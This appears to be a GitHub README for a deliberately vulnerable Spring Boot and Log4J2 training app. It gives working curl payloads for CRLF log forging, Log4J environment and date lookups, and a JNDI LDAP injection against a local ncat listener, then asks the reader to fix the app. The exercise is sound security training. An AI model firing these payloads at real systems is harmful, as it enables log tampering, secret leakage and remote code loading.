Log Injection with Spring Boot and Log4J2

Usage

Run

./gradlew bootRun

Request

curl http://localhost:8080/\?name\=Frodon

Hack

Using CRLF injection

curl http://localhost:8080/\?name\=Marty%0d%0a1985-10-30%2021%3A59%3A01.108%20DEBUG%20128537%20---%20%5Bnio-8080-exec-1%5D%20net.example.logging.HelloController%20%20%20%20%20%20%3A%20You%20have%20been%20pwed%0A

Using date lookup

Date lookup ${date:yyyyMMdd-HHmmss}:

curl http://localhost:8080/\?name\=%24%7Bdate%3AyyyyMMdd-HHmmss%7D

Using env lookup

Env lookup ${env:USER}:

curl http://localhost:8080/\?name\=%24%7Benv%3AUSER%7D

Using JNDI Injection

Run a listener

ncat -v -l -p 5000

JNDI LDAP lookup: Hello ${jndi:ldap://localhost:5000}%

curl http://localhost:8080/\?name\=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A5000%7D

Fix

Try to fix this app! Don't disable JNDI Lookup, this could be usefull.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Log Injection with Spring Boot and Log4J2

Usage

Hack

Using CRLF injection

Using date lookup

Using env lookup

Using JNDI Injection

Fix

Files

README.md

Latest commit

History

README.md

File metadata and controls

Log Injection with Spring Boot and Log4J2

Usage

Hack

Using CRLF injection

Using date lookup

Using env lookup

Using JNDI Injection

Fix